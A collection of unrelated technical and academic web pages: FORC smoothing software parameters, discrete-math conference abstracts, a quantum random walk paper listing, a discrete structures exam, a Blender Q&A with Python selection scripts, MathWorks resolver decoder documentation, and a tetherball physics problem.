larger domain: $\left[ \mathrm{hc\_min}-\Delta h_{c},\,\mathrm{hc\_max}+\Delta h_{c}\right] \times \left[ \mathrm{hu\_min}-\Delta h_{u},\,\mathrm{hu\_max}+\Delta h_{u}\right]$, where $\left\{ \begin{array}{l} \Delta h_{c}=0.1\left( \mathrm{hc\_max} - \mathrm{hc\_min} \right) \\ \Delta h_{u}=0.1\left( \mathrm{hu\_max} - \mathrm{hu\_min} \right) \end{array}\right.$. hc_min$\mathcal{M}$realN/A$\geq\min \left( h_{\mathrm{coercive}}\right)$ hc_max$\mathcal{M}$realN/A$\leq\max \left( h_{\mathrm{coercive}}\right)$ nhr$\mathcal{M}$integerN/Anhu > 0 hu_min$\mathcal{M}$realN/A$\geq \min \left( h_{\mathrm{coercive}}\right)$ hu_max$\mathcal{M}$realN/A$\leq \max \left( h_{\mathrm{coercive}}\right)$ nx$\mathcal{M}$integerN/Anx > 0 Only for output_points = rectangular_grid. In order to diminish the boundary effects (numerical artifacts), the processing is accomplished (if there are input points) on a larger domain: $\left[ \mathrm{x\_min}-\Delta x,\,\mathrm{x\_max}+\Delta x\right] \times \left[ \mathrm{y\_min}-\Delta y,\,\mathrm{y\_max}+\Delta y\right]$, where $\left\{ \begin{array}{l} \Delta x=0.1\left( \mathrm{x\_max} - \mathrm{x\_min} \right) \\ \Delta y=0.1\left( \mathrm{y\_max} - \mathrm{y\_min} \right) \end{array}\right.$. x_min$\mathcal{M}$realN/A$\geq \min \left( x\right)$ x_max$\mathcal{M}$realN/A$\leq \max \left( x\right)$ ny$\mathcal{M}$integerN/Any > 0 y_min$\mathcal{M}$realN/A$\geq \min \left( y\right)$ y_max$\mathcal{M}$realN/A$\leq \max \left( y\right)$ nsb$\mathcal{O}$integer0$\mathrm{nsb} \geq 0$ Number of points to skip at the border $h_{\mathrm{applied}}=h_{\mathrm{reversal}}$ or $h_{\mathrm{coercive}}=0$ in a regular grid output. These points are only omitted in the output data, not in the calculations. This option is useful to hide the possible boundary effects (numerical artifacts). order_of_derivative$\mathcal{O}$integer0 60, 1, 2, 3, 4, 5, 6 Order of the partial derivatives to be numerically computed in the output_points 0zero derivative, i.e., the smoothed (estimated) value $\hat{f}$ 1, 2first order derivatives $\dfrac{\partial \hat{f}}{\partial x}$, $\dfrac{\partial \hat{f}}{\partial y}$ 3, 4, 5second order derivatives $\dfrac{\partial ^{2}\hat{f}}{\partial x^{2}}$, $\dfrac{\partial ^{2}\hat{f}}{\partial x\partial y}$, $\dfrac{\partial ^{2}\hat{f}}{\partial y^{2}}$ 6FORC diagram $=-\dfrac{1}{2}\dfrac{\partial ^{2}\hat{f}}{\partial x\partial y}$ format$\mathcal{O}$stringg17.5e3N/A Format at which the values in the output files are to be saved. Effect (purpose)FormRequisiteDescription Exponential form with 'D' exponentsDw.d$\mathrm{w} > \mathrm{d}+7$ - printed number has a zero digit as the integral part - the middle d positions are for the number in normalized form - the last three positions are for the exponent, including its sign Exponential form with 'E' exponentsEw.d$\mathrm{w} > \mathrm{d}+7$ Ew.dEe$\mathrm{w} > \mathrm{d}+\mathrm{e}+5$the only difference from the above is that the exponent part has e positions plus one more for its sign Engineering formENw.d$\mathrm{w} > \mathrm{d}+9$printed number has no more than three and at least one non-zero digits, and the exponent is a multiple of three ENw.dEe$\mathrm{w} > \mathrm{d}+\mathrm{e}+7$ Scientific formESw.d$\mathrm{w} > \mathrm{d}+7$printed number has one non-zero digit as the integral part ESw.dEe$\mathrm{w} > \mathrm{d}+\mathrm{e}+5$ Decimal form(no exponent)Fw.d$\mathrm{w} > \mathrm{d}+2$if $d=0$ no fractional part will be printed, the right-most position being the decimal point Mixture of the F and E formatsGw.dsee aboveif a number can reasonably be printed with F format, that is used, all others (very large and very small) are displayed in E format Gw.dEesee above where: w = number of positions to be used to write a number including its sign, decimal point, decimal places, exponent part and leading spaces between two consecutive numbers on a line d = number of digits to the right of the decimal point e = number of digits in the exponent part without its sign Warning: errors with FORMAT are not detected until writing time, when the output can be asterisks * Regression / Least squares fit regression_method$\mathcal{O}$stringqsheploess LOESS (LOcal regrESSion) method using quadratic polynomials for the local fitting qshepquadratic → modified quadratic polynomial Shepard method cshepcubic → modified cubic polynomial Shepard method tsheptrigonometric → modified cosine series Shepard method drop_x2$\mathcal{O}$logicalfalsetrue false Drop square: only for 'regression_method = loess' or 'regression_method = qshep'. Specifies the quadratic monomials to exclude from the local quadratic fits. For example, 'drop_x2 = false, drop_y2 = true' uses the monomials 1, $x$, $y$, $x^{2}$, and $xy$ in performing the local fitting. drop_y2 kernel$\mathcal{O}$integer6 1uniform (rectangular window)$1$ 2triangular$1-\left\vert u\right\vert$ 3Epanechnikov (quadratic, parabolic)$1-u^{2}$ 4quartic (biweight, bisquare)$\left( 1-u^{2}\right) ^{2}$ 5triweight$\left( 1-u^{2}\right) ^{3}$ 6tricube$\left( 1-\left\vert u\right\vert ^{3}\right) ^{3}$ 7raised cosine (Tukey-Hanning)$\dfrac{1+\cos \left( \pi u\right) }{2}$ 8cosine$\cos \left( \dfrac{\pi }{2}u\right)$ 9Gaussian$\exp\left( -\dfrac{1}{2}\dfrac{u^{2}}{\sigma ^{2}}\right)$ 10exponential$\exp \left( -\lambda \left\vert u\right\vert \right)$ 11inverse distance$\dfrac{1}{1+\left\vert u\right\vert }$ 12Cauchy$\dfrac{1}{1+u^{2}}$ 13Parzen $\left\{ \begin{array}{ll} 1-6u^{2}+6\left\vert u\right\vert ^{3} & \mathrm{,if\enspace }0\leq \left\vert u\right\vert <0.5 \\ 2\left( \,1-\left\vert u\right\vert \right) ^{3} & \mathrm{,if\enspace }0.5\leq \left\vert u\right\vert \leq 1% \end{array}% \right.$ 14McLain$\dfrac{1}{\left( \varepsilon +\left\vert u\right\vert \right) ^{2}}$ 15Franke-Nielson$\dfrac{1-\left\vert u\right\vert }{\varepsilon +\left\vert u\right\vert }$ uif$\mathcal{O}$real1.0 User interpolation factor = Scale factor for the weight associated with a node in the least squares system for the corresponding nodal function. A large weight can be used to force interpolation. Default value 1 means "pure" fitting. nrr$\mathcal{O}$integer0nrr ≥ 0 Number of robust locally weighted regressions: initial fit is followed by nrr iteratively reweighted iterations. Such iterations are appropriate when there are outliers in the data or when the error distribution is a symmetric long-tailed distribution. If nrr is provided then: • nn_list should be provided also • no CRITERION (or DEFAULT) should be provided • only (nn, RSS, RSSm) is provided as statistics Default value 0 means no robust regression. nn_list nn_range Number of nearest neighbors nn (smoothing parameter) - number of data points to be used in the least squares fit for coefficients defining the nodal functions. • radius of each neighborhood is chosen so that the neighborhood contains a specified number of the data points • nn in each local neighborhood controls the smoothness of the estimated surface • minimum value of nn: loess: 7, qshep: 6, cshep: 10, tshep: 10 (each of drop_x2 and drop_y2 decreases by one unit the minimum value of nn required by the loess and qshep methods respectively) • one of nn_list or nn_range options is required • only one of nn_list and nn_range options can be used nn_list$\mathcal{M}$integerN/Asee above nn_list specifies a list of positive integer nn values and it can be given as: • a list of values, separated by spaces or by commas • a loop construct start : end : increment, where increment is optional (default increment is 1) • a combination of the above methods • for example, '10 20:30:5 50' will return the values '10,20,25,30,50' - if no CRITERION is specified → a separate fit is provided for each nn value - if a CRITERION is specified → all values specified in nn_list are examined, and the value that minimizes the specified CRITERION is selected nn_range$\mathcal{M}$integerN/Asee above nn_range specifies two values: lower, upper • the two values must be separated by spaces or by comma • only the values lower ≤ nn ≤ upper are examined, and the value that minimizes the specified CRITERION is selected • golden section search method is used to find a local minimum of the specified CRITERION in the [lower, upper] range rnnw$\mathcal{O}$real1.0rnnw > 0 Only for 'shep' methods and only for output_points ≠ input_points. Relative number (with regard to nn) of nearest neighbors used to compute the output in points that are different from the input points. Statistics ihat$\mathcal{O}$integer10, 1, 2 Only for 'loess' method: • determines how the statistical quantities are computed • can be decreased by the 'nrr' option • can be increased if necessary by the CRITERION parameter ihatstatistics 0The hat matrix $L$ is not computed 1Only the diagonal of $L$ matrix is computed → approximate delta 2Full $L$ matrix is computed: • exact delta • use only for testing • it is not meant for routine usage because computation time can be horrendous istat$\mathcal{O}$integer10, 1, 2 Only for 'shep' methods: • regardless of 'istat' value, no approximations are used in the statistics computation • can be decreased by the 'nrr' option • can be increased if necessary by the CRITERION parameter istatstatistics alpha$\mathcal{O}$real0.050 < alpha < 1 Significance level for confidence intervals. Only for ihat = 2 or istat = 2. smoothresidual$\mathcal{O}$logicalfalsetrue false Add in the smoothed_input file a smoothing fit of the residuals for each smoothing parameter nn. This fit is computed independently of the fit that is used to obtain the residuals. CRITERION$\mathcal{O}$stringDEFAULT Criterion for automatic smoothing parameter selection. DEFAULT value means: - no automatic selection for nn_list - AICC for nn_range AICCan approximation of AICC1 AICC1corrected/improved version of Akaike information criterion (AIC) GCVgeneralized cross validation DF1degrees of freedom DF2 DF3 DFtarget$\mathcal{M}$realN/A1 < DFtarget < n Degrees of Freedom target → only for 'DF' criterions
2020-04-03 11:16:10
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6288323402404785, "perplexity": 2635.459290256744}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370510846.12/warc/CC-MAIN-20200403092656-20200403122656-00370.warc.gz"}
http://canadam.math.ca/2017/program/abs/cg3
CanaDAM 2017 Ryerson University, June 12 - 16, 2017 canadam.math.ca/2017 français conference home canadam home Computational Geometry [PDF] EDWARD LEE, University of Waterloo Recognizing Circle Graphs  [PDF] A circle graph is the intersection graph of chords on a circle. There is a correspondence between bipartite circle graphs and planar graphs, and hence every characterization for the class of circle graphs gives a characterization for the class of planar graphs. Given a graph, Naji describes a system of linear equations whose solvability determines whether or not the graph is a circle graph. We will sketch a new proof of this beautiful theorem which is considerably simpler than the existing proofs due to Naji, Gasse, and Traldi. This is joint work with Jim Geelen. SHIKHA MAHAJAN, University of Waterloo A Faster Algorithm for Recognizing Edge-Weighted Interval Graphs  [PDF] We investigate an edge-weighted version of interval graphs. A graph with weights on its edges is an edge-weighted interval graph if we can assign intervals to the vertices so that the weight of an edge $(u,v)$ is equal to the length of the intersection of the intervals assigned to $u$ and $v$. In 2012, K\"{o}bler, Kuhnert, and Watanabe gave an algorithm to recognize such graphs in time $O(m \cdot n)$, where $m$ and $n$ are the number of edges and vertices, respectively, of the given graph. We improve the runtime of this algorithm to $O(m \cdot \log{n})$ using $PQ$ trees. \newline \newline Joint work with Anna Lubiw. JAKUB SOSNOVEC, University of Warwick Squarability of Rectangle Arrangements  [PDF] We study when an arrangement of axis-aligned rectangles can be transformed into an arrangement of axis-aligned squares in $\mathbb{R}^2$ while preserving its structure. We found a counterexample to the conjecture of J. Klawitter, M. N\"{o}llenburg and T. Ueckerdt whether all arrangements without crossing and side-piercing can be squared. Our counterexample also works in a more general case when we only need to preserve the intersection graph and we forbid sidepiercing between squares. We also show counterexamples for transforming box arrangements into combinatorially equivalent hypercube arrangements. Finally, we introduce a linear program deciding whether an arrangement of rectangles can be squared in a more restrictive version where the order of all sides is preserved. Joint work with Mat\v{e}j Kone\v{c}n\'{y}, Stanislav Ku\v{c}era, Michal Opler, \v{S}t\v{e}p\'{a}n \v{S}imsa and Martin T\"{o}pfer.
2018-01-23 21:47:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4940755367279053, "perplexity": 689.1354449433312}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084892699.72/warc/CC-MAIN-20180123211127-20180123231127-00199.warc.gz"}
https://www.semanticscholar.org/paper/Open-Quantum-Random-Walks-and-Quantum-Markov-Chains-Mukhamedov-Souissi/ddb15d2d27fa8de1ba0b7ea389796ff1ee4863b6
# Open Quantum Random Walks and Quantum Markov Chains @article{Mukhamedov2019OpenQR, title={Open Quantum Random Walks and Quantum Markov Chains}, author={Farrukh Mukhamedov and Abdessatar Souissi and Tarek Hamdi}, journal={Functional Analysis and Its Applications}, year={2019}, volume={53}, pages={137-142} } • Published 1 April 2019 • Mathematics • Functional Analysis and Its Applications In the present paper we construct quantum Markov chains associated with open quantum random walks in the sense that the transition operator of a chain is determined by an open quantum random walk and the restriction of the chain to the commutative subalgebra coincides with the distribution ℙρ of the walk. This sheds new light on some properties of the measure ℙρ. For example, this measure can be considered as the distribution of some functions of a certain Markov process. 5 Citations ### Quantum Markov Chains on Comb Graphs: Ising Model • Mathematics Proceedings of the Steklov Institute of Mathematics • 2021 Abstract We construct quantum Markov chains (QMCs) over comb graphs. As an application of this construction, we prove the existence of a disordered phase for Ising type models (within the QMC scheme) ### Refinement of quantum Markov states on trees • Mathematics, Computer Science • 2021 It turns out that localized QMS has the mentioned property which is called sub-Markov states, this allows us to characterize translation invariant QMS on regular trees. ### A crossover between open quantum random walks to quantum walks • Mathematics, Physics • 2020 We propose an intermediate walk continuously connecting an open quantum random walk and a quantum walk with parameters $M\in \mathbb{N}$ controlling a decoherence effect; if $M=1$, the walk coincides ### Mean Hitting Time for Random Walks on a Class of Sparse Networks • Mathematics Entropy • 2022 For random walks on a complex network, the configuration of a network that provides optimal or suboptimal navigation efficiency is meaningful research. It has been proven that a complete graph has ## References SHOWING 1-10 OF 68 REFERENCES ### Quantum Markov Chains Associated with Open Quantum Random Walks • Mathematics Journal of Statistical Physics • 2019 In this paper we construct (nonhomogeneous) quantum Markov chains associated with open quantum random walks. The quantum Markov chain, like the classical Markov chain, is a fundamental tool for the ### Open quantum random walks, quantum Markov chains and recurrence • Mathematics Reviews in Mathematical Physics • 2019 In the present paper, we construct QMCs (Quantum Markov Chains) associated with Open Quantum Random Walks such that the transition operator of the chain is defined by OQRW and the restriction of QMC ### Limit Theorems for Open Quantum Random Walks • Mathematics, Physics • 2013 We consider the limit distributions of open quantum random walks on one-dimensional lattice space. We introduce a dual process to the original quantum walk process, which is quite similar to the ### Open Quantum Random Walks • Physics, Mathematics • 2012 A new model of quantum random walks is introduced, on lattices as well as on finite graphs. These quantum random walks take into account the behavior of open quantum systems. They are the exact ### On a Class of Quantum Channels, Open Random Walks and Recurrence • Mathematics • 2014 We study a particular class of trace-preserving completely positive maps, called PQ-channels, for which classical and quantum evolutions are isolated in a certain sense. By combining open quantum ### Quantum Markov fields on graphs • Mathematics • 2009 We introduce generalized quantum Markov states and generalized d-Markov chains which extend the notion quantum Markov chains on spin systems to that on $C^*$-algebras defined by general graphs. As ### Quantum Markov chains: A unification approach • Mathematics Infinite Dimensional Analysis, Quantum Probability and Related Topics • 2020 In this paper, we study a unified approach for quantum Markov chains (QMCs). A new quantum Markov property that generalizes the old one, is discussed. We introduce Markov states and chains on general ### Open quantum walks • Physics, Mathematics The European Physical Journal Special Topics • 2019 Open quantum walks (OQWs) are a class of quantum walks, which are purely driven by the interaction with the dissipative environment. In this paper, we review theoretical advances on the foundations ### Stopping times for quantum Markov chains • Mathematics • 1992 In the paper we introduce stopping times for quantum Markov states. We study algebras and maps corresponding to stopping times, give a condition of strong Markov property and give classification of ### Open Quantum Random Walks: Reducibility, Period, Ergodic Properties • Mathematics • 2014 We study the analogues of irreducibility, period, and communicating classes for open quantum random walks, as defined in (J Stat Phys 147(4):832–852, 2012). We recover results similar to the standard
2022-12-09 16:27:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7096573710441589, "perplexity": 1493.3326501626684}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711417.46/warc/CC-MAIN-20221209144722-20221209174722-00147.warc.gz"}
http://www.ques10.com/p/1149/discrete-structures-question-paper-dec-2012-comp-1/
Question Paper: Discrete Structures : Question Paper Dec 2012 - Computer Engineering (Semester 3) | Mumbai University (MU) 0 ## Discrete Structures - Dec 2012 ### Computer Engineering (Semester 3) TOTAL MARKS: 80 TOTAL TIME: 3 HOURS (1) Question 1 is compulsory. (2) Attempt any three from the remaining questions. (3) Assume data if required. (4) Figures to the right indicate full marks. 1(a) Show that: 12 + 32 + 52+ ... + (2n-1)2 = (4n3 - n)/3 (6 marks) 1(b) Show that if any 5 numbers from 1 to 8 are chosen , then two of them will add to 9.(6 marks) 1(c) Out of 250 candidates who failed in an examination, it was revealed that 128 failed in mathematics, 87 in physics and 134 in aggregate. 31 failed in mathematics and in physics, 54 failed in the aggregate and in mathematics, 30 failed in aggregate and in physics. Find how many candidates failed: i. In all the 3 subjects ii. In mathematics but not in physics iii. In the aggregate but not in physics iv. In physics but not in aggregate or in mathematics (8 marks) 2(a) Determine whether the following relation are symmetric, asymmetric and antisymmetric. (6 marks) 2(b) Construct truth table to determine whether the given statement is a tautology, contradiction or neither i. (q ? p) ? (q ? ~p) ii. (p ? ~q) ? p (6 marks) 2(c) If R be a relation in the set of integers z defined by: R={(x,y): x belongs to z, y belongs to z, x-y is divisible by 3}, show that the relation R is an equivalence relation and describe the equivalence classes(8 marks) 3(a) Define with example injective, bijective and surjective function(6 marks) 3(b) Let A={a,b,c,d,e} and let R and S be two relation on A whose corresponding diagraph are shown below. Find complement of R, R-1, R ? S and R ? S (8 marks) 3(c) A connected planar graph has 10 vertices each of degree 3 . Into how many regions does a representation of this planar graph split the plane?(6 marks) 4(a) Determine whether the following pairs of graph are isomorphic or not. (6 marks) 4(b) Let F: R ? R, F(x)=x2-1, g(x)=(4x2+2) Find i) f o (g o f) ii) g o (f o g) (6 marks) 4(c) Draw harse diagram of the poset D30 and identify whether it is a linearly ordered or not (8 marks) 5(a) Let A={1,2,3,4} and R={(1,2), (2,1) ,( 2,2), (4,3), (3,1) } Find the transitive closure of the relation R by warshall's algorithm(6 marks) 5(b) Define a Ring and field. Let R={0,1,2,3}. Show that the modulo 4 system is a ring.(8 marks) 5(c) Determine which of the following graph contains an eulerian or Hamiltonian Circuit (6 marks) 6(a) Consider the (2,6) group encoding function e:B2 ? B6 defined by: e(00) =000000 e(01)=011110 e(10)=101101 e(11)=110011 Decode the following relative to maximum likelihood decoding function i) 001110 ii) 111101 iii) 110010 (8 marks) 6(b) Solve the recurrence relation an = 4(an-1 - an-2) where a0 = 1, a1=1(6 marks) 6(c) Show that {1,5,7,11} is a abelian group under multiplication modulo 12(6 marks) 7(a) Define with example i. Normal subgroup ii. Spanning tree iii. Planar graph iv. Quantifiers (8 marks) 7(b) Consider chains of divisors of 4 and 9 i.e, l1={1,2,4} and l2={1,3,9} and partial ordering relation of division on l1 and l2. Draw the lattice L1 * L2(6 marks) 7(c) Prove that every field is an integral domain(6 marks)
2019-04-25 14:49:56
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8774606585502625, "perplexity": 3329.584914408419}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-18/segments/1555578721468.57/warc/CC-MAIN-20190425134058-20190425160058-00496.warc.gz"}
https://blender.stackexchange.com/questions/51296/is-there-a-way-to-save-selection-by-faces?noredirect=1
# Is there a way to save selection by faces I'm trying to find a way to save selection faces, tried Vertex Group, the issue with Vertex Group is that it adds the faces that are marked by 4 vertices that are added to the Vertex Group, there are some cases were this doesn't apply, the image explains what I mean. So is there a way to save my selected faces, so I don't have to go through the whole process of reselecting them each time I need to do so? If you check the image, I didn't assign the hatched faces to the Vertex Group, still when I select the Vertex Group, they get selected, I understand that they got selected because the four boundary vertices are assigned to the Vertex Group, I need to save only face selection, not vertex selection. This is a limitation of the current Vertex Groups system that has been an occasional nuisance. That's is why they are called Vertex Groups, not "Face Groups"; selections of vertex don't unequivocally define groups of faces, since a vertex can belong to an arbitrary number of them. Would be nice to hear about more options and solutions for this from other users around here. The way I generally solve this is by using material slots instead, if you don't mind the additional pollution in the materials list. Go to Properties Window > Materials Tabs > Add New Material Slot button, and then with the desired faces selected press the Assign button. Since they work on a per-face basis instead of single vertex, they can correctly define face groups. You can still assign materials independently, but you can't have a face belong to more than one slot unfortunately, so you may end up having several slots with the same materiel. Different intersections of selections overlapping materials may require an exponentially growing number of slots. • But that will change the material, right? – Georges Apr 23 '16 at 22:41 • Yeah I guess this is the best solution, in case I need several groups of faces to have the same material, I just have to copy, rename and keep same parameters. Thanks! – Georges Apr 23 '16 at 22:50 • Yeah, you can use the same material on multiple slots of the same object. You'll get some redundancy, but I guess it's better than nothing. – Duarte Farrajota Ramos Apr 24 '16 at 0:46 Actually, in Blender 2.80 you can save face selections using the "Face Maps" grouping. It is located in the "Object Data" panel. It works the same as vertex groups but stores faces instead. It's possible to store the selection state into a Vertex Color map. The following script creates a vertex color map Selection with a black face for every selected face and a white face for every non-selected. Strictly speaking this would be “every vertex of every polygon”. But the main difference to vertex groups is that each vertex appears multiple times in the vertex color map – once for every polygon that it's part of. So it's possible identify the faces by their vertices. import bpy obj = bpy.context.active_object me = obj.data bpy.ops.object.mode_set(mode='OBJECT') col = me.vertex_colors.new('Selection') for poly in me.polygons: for l_ix in poly.loop_indices: if poly.select: col.data[l_ix].color = (0, 0, 0) bpy.ops.object.mode_set(mode='EDIT') The following script restores the selection from the vertex color map. import bpy, bmesh from mathutils import Color bpy.context.tool_settings.mesh_select_mode = (False, False, True) bpy.ops.object.mode_set(mode='EDIT') bpy.ops.mesh.select_all(action='DESELECT') bpy.ops.object.mode_set(mode='OBJECT') obj = bpy.context.active_object me = obj.data bm = bmesh.new() bm.from_mesh(me) col = me.vertex_colors['Selection'] for (poly, bm_poly) in zip(me.polygons, bm.faces): l_ix = poly.loop_indices[0] # Only look at first vertex as all should have same color if col.data[l_ix].color == Color((0, 0, 0)): bm_poly.select_set(True) bm.to_mesh(me) bm.free() bpy.ops.object.mode_set(mode='EDIT') By adjusting the name of the vertex color map you can store multiple selections for every object.
2020-09-30 19:04:32
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.21966247260570526, "perplexity": 1140.8602532059065}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-40/segments/1600402127397.84/warc/CC-MAIN-20200930172714-20200930202714-00170.warc.gz"}
https://uk.mathworks.com/help/mcb/ref/resolverdecoder.html
# Resolver Decoder Compute electrical angular position of resolver • Library: • Motor Control Blockset / Sensor Decoders ## Description The Resolver Decoder block calculates the electrical angular position of the resolver from the resolver sine and cosine output signals. The resolver uses a primary sinusoidal excitation input signal to generate the modulated secondary sine and cosine waveforms. You must normalize these waveforms (within the range of [-1,1] and centered at 0) and sample them to obtain the secondary sine and cosine input signals of the Resolver Decoder block. The block computes and outputs the resolver position in [0, 2π] radians. The block can also add a phase delay to the sampled sine and cosine signals with respect to the excitation signal. Note The block inputs should have identical amplitude and data types (either signed fixed or floating point). ### Equations The block computes the average, peak amplitude values, and the sign of the peak amplitude of a signal cycle as `${Å}_{average}=\frac{1}{n}\sum _{i=0}^{n-1}\left(|{Å}_{i}|\right)$` `${Å}_{peak}={Å}_{average}×\frac{\pi }{2}$` where: • ${Å}_{average}$ is the average amplitude value of a signal cycle • $n$ is the number of samples per excitation cycle • ${Å}_{peak}$ is the peak amplitude value of a signal cycle The block computes the electrical angular position of the resolver as where: • ${u}_{\text{sin}_peak}$ is the ${Å}_{peak}$ of the secondary sine signal • ${u}_{\text{cos}_peak}$ is the ${Å}_{peak}$ of the secondary cosine signal • $\theta$ is the electrical angular position of the resolver ## Ports ### Input expand all Secondary sine waveform output from the resolver that is sampled and normalized within the range of [-1, 1] and centered at 0. Data Types: `single` | `double` | `fixed point` Secondary cosine waveform output from the resolver that is sampled and normalized within the range of [-1, 1] and centered at 0. Data Types: `single` | `double` | `fixed point` ### Output expand all Electrical angular position of the resolver (and the rotor) in [0, 2π] radians. Data Types: `single` | `double` | `fixed point` ## Parameters expand all The phase delay that the block must add to the `Sin` and `Cos` input port signals. Number of samples available in one cycle of the `Sin` and `Cos` input port signals. The data type of the resolver position output `θ`.
2021-03-01 04:52:52
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 10, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.871997594833374, "perplexity": 3214.4605957021977}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178361849.27/warc/CC-MAIN-20210301030155-20210301060155-00062.warc.gz"}
https://brilliant.org/problems/tetherball-2/
# Tetherball Consider a ball hung from rope of length $l=2~\text{m}$ which is attached to the top of a vertical pole. Initially, the rope is vertical and the ball is given a horizontal initial speed $v_{0}$. What is minimum initial speed $v_{0}$ in meters per second for which the ball hits the top of the pole. Ignore friction, the mass of the rope and treat the ball as a point mass. Details and assumptions $g=9.8~\text{m}/\text{s}^2$ ×
2021-02-27 22:36:37
